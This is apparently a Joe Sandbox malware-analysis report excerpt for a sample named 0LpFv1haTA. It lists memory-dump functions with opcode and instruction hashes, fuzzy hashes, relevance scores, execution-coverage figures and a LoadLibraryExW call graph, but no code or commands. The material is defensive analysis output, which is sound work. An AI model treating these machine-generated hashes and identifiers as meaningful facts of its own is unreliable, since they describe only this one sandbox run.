                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3600855894f24111ee91eb8cc6e00a5a5ccdcb05018d261e487b687657b0b42b
                                                                                                                                                                                                  • Instruction ID: 95ee9ba83daa1de797d13c314a71f120b451bcb76a08e75204f8f48b865a4104
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3600855894f24111ee91eb8cc6e00a5a5ccdcb05018d261e487b687657b0b42b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB51BE71D0955A8FEB99EF28C4503B9B7B1EF69740F4001BAC00DEB2D2DA355E89CB40
                                                                                                                                                                                                  Function 00007FF848F34C3E Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3454760b8a6d46735e64cc26fea0ade0e3fa73f68468554d2ecbe35ecd53f56e
                                                                                                                                                                                                  • Instruction ID: e9bb59c381c1fa21d0ea7cd84b8dc1c405f4bb590823ff66ece2e20ad6ddf7b2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3454760b8a6d46735e64cc26fea0ade0e3fa73f68468554d2ecbe35ecd53f56e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0241D670D1965D9FEB95EFA8D4986ECBBF1FF29341F50006AD009E7292DB389984CB04
                                                                                                                                                                                                  Function 00007FF848F34C50 Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 37e70d0b88c7551cfcdd3cb7af747e3ece6790d36082c07c2e92e17b4d70deb7
                                                                                                                                                                                                  • Instruction ID: 101458f5cd6fd11ca9411e8394b0d5e2269fbfdf85c282dad2ac8c81913b1834
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37e70d0b88c7551cfcdd3cb7af747e3ece6790d36082c07c2e92e17b4d70deb7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9541D770D1861D9FEB54EFA8D4986ECBBF1FF29341F50006AD009E7291DB349980CB04
                                                                                                                                                                                                  Function 00007FF848F36055 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 8c33d74fe700e8c7e4c76e254b863eff9c128098b3bb0048b932d8a6aa97827b
                                                                                                                                                                                                  • Instruction ID: 4c3efc589e5289499db6d9e82d1a01ba6428ee0527028f525947bdafb82e23ea
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c33d74fe700e8c7e4c76e254b863eff9c128098b3bb0048b932d8a6aa97827b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79310471C0DA894FE74AAB2488662F83BB1FF46380F1501A7D049DB2E3DE2D2989C755
                                                                                                                                                                                                  Function 00007FF848F35E0A Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 6ed63d729caec1cdbe9cc51e616136c2ad69137b5915e309c7957d930fffbf25
                                                                                                                                                                                                  • Instruction ID: 0b60169aa82ccbe0a9efdb80e3ca328afeee78eb74fce912b41ed97f4227f32c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ed63d729caec1cdbe9cc51e616136c2ad69137b5915e309c7957d930fffbf25
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81315471D0865E8FDB89EF68D4516EDBBF1FF99301F00006AE409E7292CB396994CB90
                                                                                                                                                                                                  Function 00007FF848F35F21 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 677e27370b86fc01266633e2bf2a136bc330b9e1d7a762a11b713988356faf61
                                                                                                                                                                                                  • Instruction ID: 763529d81ad2a08a03981db61de34e8f92f0c187d703be04c1c37c936bc18dde
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 677e27370b86fc01266633e2bf2a136bc330b9e1d7a762a11b713988356faf61
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C221B03190DA5D8FDB55EF6898055ED7BB1FF8A311F04067BE009D3281CB3969418B91
                                                                                                                                                                                                  Function 00007FF848F3564D Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: e7a16975dd5488e06103ccfdd5e136415a1026212a514aca4e6dcb55b81f8381
                                                                                                                                                                                                  • Instruction ID: ded602573072eb0b1b3c2dac1912d4116f42ba6885aaf3ba467e8c6ae5100542
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7a16975dd5488e06103ccfdd5e136415a1026212a514aca4e6dcb55b81f8381
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E221D7B1D0D68A9FE746EB2888582E97FB1FF5A340F8544E6C048DB292EF355A49C710
                                                                                                                                                                                                  Function 00007FF848F31D36 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 782a83d94341f30898a828fa9b72f5e0e058e9ec5e63bf9101f0bade93fcc33a
                                                                                                                                                                                                  • Instruction ID: 001f1d554ef427ce2f0d09762416a476315e40a56bbb0e27ea4e71d61913b639
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 782a83d94341f30898a828fa9b72f5e0e058e9ec5e63bf9101f0bade93fcc33a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CF01432D0892D8FDF94EB98D845AECB7B1FB58300F40016AD00DE3251DF3468818B40
                                                                                                                                                                                                  Function 00007FF848F349D5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 2c48120a06104564c32ce2b45265eea0573a2902450a8a8922239a9380e744ab
                                                                                                                                                                                                  • Instruction ID: c379b1bcfeb195d8ffb9f5b8ea69e37e3d9dae9aa3d9c268a9b1cfd0c4ee7afb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c48120a06104564c32ce2b45265eea0573a2902450a8a8922239a9380e744ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF0E931D0E68C8FEB116FA4D8152FABBA0FF56351F4111B7E108E71C2DB285014875A
                                                                                                                                                                                                  Function 00007FF848F34E61 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 78f5be1af1349a97ca0b62b6b0c5764482e556dfee4aa511c7d3c995914ee788
                                                                                                                                                                                                  • Instruction ID: 6e10490662357b869a0c4b5dcb711cb402248809ebdc4ef27513c7dedb061e0a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 78f5be1af1349a97ca0b62b6b0c5764482e556dfee4aa511c7d3c995914ee788
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5F03A31D0651A8FEB08AB94D4506FEB7B0EF55341F40102AD40AA32C2DE3859848A65
                                                                                                                                                                                                  Function 00007FF848F35FED Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 652f54f92f8736d5b7e8322c0c57696cc9e9b70f7617929b70ad44ef4fc6758e
                                                                                                                                                                                                  • Instruction ID: be523db585e18e2f5ccbad27f61b22df5049463ffba8f9428276e20a11162335
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 652f54f92f8736d5b7e8322c0c57696cc9e9b70f7617929b70ad44ef4fc6758e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBE0D879D1CA5D8FDB41BB98A8056E5B7A1FB89308F0001AAD40CD71C1D72D5811D755
                                                                                                                                                                                                  Function 00007FF848F32A03 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: a007b3c010e8465ec302f4d3076f64c128f6f8a0307489c1ce6d910ff8da74c9
                                                                                                                                                                                                  • Instruction ID: 272b1e25f38651bb5e7ebc7ef455d3bb93fb7f8ea6b3af91969526b8979ef669
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a007b3c010e8465ec302f4d3076f64c128f6f8a0307489c1ce6d910ff8da74c9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6D01223F18C5B1FD654A66CA8456A552C1EB94690F4446B3D40EC3289EE6DA9834384
                                                                                                                                                                                                  Function 00007FF848F3560D Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: b70b9b89302d274de903e2f9d202edd91076b7e03aab6ae7bfc59a1a156faacf
                                                                                                                                                                                                  • Instruction ID: 84c6f45c1b19f54ab613def979ed7ed0088159720a01f7dd3b7998e425e7365b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b70b9b89302d274de903e2f9d202edd91076b7e03aab6ae7bfc59a1a156faacf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAE0D872C4D3C94FD7566F2459151E87F70FF46300F4501B7E588860D3EB69A618C755

                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                  Function 00007FF848F32522 Relevance: 11.5, Strings: 9, Instructions: 207COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: aH$!M_I$(aH$0aH$8aH$@aH$HaH$cH$dH
                                                                                                                                                                                                  • API String ID: 0-3707677422
                                                                                                                                                                                                  • Opcode ID: dfbe5c76f36566bc9811647b9cfb9ad2603a8d94390a6278e032d47bf3380dbe
                                                                                                                                                                                                  • Instruction ID: 0e70f248da8ed683d6db9f89daecf13ad2d03421f2850042f97ff7655ad99778
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfbe5c76f36566bc9811647b9cfb9ad2603a8d94390a6278e032d47bf3380dbe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4510C23D0E6C68FF35657B868190746FA0FF52A52F4942FBC488870E7EA2C5D458349
                                                                                                                                                                                                  Function 00007FF848F306F0 Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002E.00000002.3243379649.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_46_2_7ff848f30000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: M_^=$M_^>$M_^?$M_^@
                                                                                                                                                                                                  • API String ID: 0-1339898167
                                                                                                                                                                                                  • Opcode ID: d045b1776b4013a9e41832a66d00135559c9ed8aaa4a1923af920e896ed4bfbe
                                                                                                                                                                                                  • Instruction ID: fd37681e46afeb7923388121adb58663e4b170174f56999d0240a2441edd4623
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d045b1776b4013a9e41832a66d00135559c9ed8aaa4a1923af920e896ed4bfbe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B821F87392A165E9D2417BBC78455DA3774EF403B8F4547B6E09CCD093EE1C208687A8

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:16.5%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:3
                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                  execution_graph 3659 7ff848f170e9 3661 7ff848f170ef LoadLibraryExW 3659->3661 3662 7ff848f1720c 3661->3662

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 00007FF848F170E9 Relevance: 1.7, APIs: 1, Instructions: 183COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 328 7ff848f170e9-7ff848f170ed 329 7ff848f170ef-7ff848f170f6 328->329 330 7ff848f170f7-7ff848f17190 328->330 329->330 334 7ff848f171ac-7ff848f1720a LoadLibraryExW 330->334 335 7ff848f17192-7ff848f171a9 330->335 336 7ff848f1720c 334->336 337 7ff848f17212-7ff848f17264 334->337 335->334 336->337
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000002F.00000002.3947940143.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_47_2_7ff848f10000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f815de077a01e96d77ac562d465152f7bb032dd1cb116d267fbae8afb511f9b8
                                                                                                                                                                                                  • Instruction ID: dff464a67ecfcebc9628337189786532868b5f73b27e3f7374863cf76b3c33ff
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f815de077a01e96d77ac562d465152f7bb032dd1cb116d267fbae8afb511f9b8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7514C70908A5C8FEB98EF58D889BE9BBF0FB59311F0041AED04DE7252DB759885CB40

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:15.2%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:3
                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                  execution_graph 2750 7ff848f170e9 2751 7ff848f170ef LoadLibraryExW 2750->2751 2753 7ff848f1720c 2751->2753

                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                  Function 00007FF848F170E9 Relevance: 1.7, APIs: 1, Instructions: 183COMMON
                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 215 7ff848f170e9-7ff848f170ed 216 7ff848f170ef-7ff848f170f6 215->216 217 7ff848f170f7-7ff848f17190 215->217 216->217 221 7ff848f171ac-7ff848f1720a LoadLibraryExW 217->221 222 7ff848f17192-7ff848f171a9 217->222 223 7ff848f1720c 221->223 224 7ff848f17212-7ff848f17264 221->224 222->221 223->224
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000030.00000002.4550628492.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_48_2_7ff848f10000_0LpFv1haTA.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: f815de077a01e96d77ac562d465152f7bb032dd1cb116d267fbae8afb511f9b8
                                                                                                                                                                                                  • Instruction ID: dff464a67ecfcebc9628337189786532868b5f73b27e3f7374863cf76b3c33ff
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f815de077a01e96d77ac562d465152f7bb032dd1cb116d267fbae8afb511f9b8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C7514C70908A5C8FEB98EF58D889BE9BBF0FB59311F0041AED04DE7252DB759885CB40